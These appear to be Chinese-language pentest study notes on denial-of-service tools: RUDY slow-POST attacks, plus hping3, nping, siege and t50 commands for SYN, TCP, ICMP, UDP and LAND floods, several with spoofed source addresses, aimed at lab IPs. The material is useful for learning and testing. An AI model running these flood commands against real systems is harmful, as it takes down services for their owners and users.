Rudy
- 慢速应用层HTTP POST攻击,与slowhttptest原理相同
- 每次只传输一个字节的数据
- 美剧黑客军团中曾提到此攻击手段
- 攻击有表单WEB页面,攻击时需指定攻击的参数名称
- 官网https://sourceforge.net/projects/r-u-dead-yet/
kali:vi rudeadyet.conf
./r-u-dead-yet-v2.2.py #进行攻击
hping3
几乎可以定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试
syn_flood 攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.119 #-c连接数,-d数据段大小,-S是syn标记,-w是window大小,-p是端口
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.119 #-P是push标记
tcp_flood 攻击
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.119 #TCP的标记都标满,就是消耗资源
icmp_flood 攻击
hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.1.119 #-q安静模式,-n不解析域名,-a伪造源地址
udp_flood 攻击
hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.1.119
LAND攻击
- 特殊种类的 SYN Flood 攻击
- 源地址和目的地址都是靶机IP,受害者和自己完成三次握手
hping3 -n -a 1.1.1.1 -S -d 100 -p 80 —flood 1.1.1.1
NPing攻击
TCP全链接DOS攻击
nping —tcp-connect —rate=10000 -c 1000000000 -q 1.1.1.1
查公网IP
nping —echo-client “public” echo.nmap.org —udpSiege
http/https 压力测试工具,模拟多个用户并发访问请求
siege -g http://192.168.1.119 #-g获取banner,类似nc
siege -i -c 1000 http://192.168.1.119 -A siegehttp #-i是internet模式,-c是用户数量,-A是http头
#同时攻击多个 url ,使用 -f 调用字典文件/etc/siege/urls.txt
siege -i -c 1000 #这样也会调用字典文件
T50网络压力测试
t50 1.1.1.1 —flood —turbo -S —protocol TCP —dport 80
- t50 1.1.1.1 —flood —turbo -S TCP UDP OSPF EIGRP —dport 22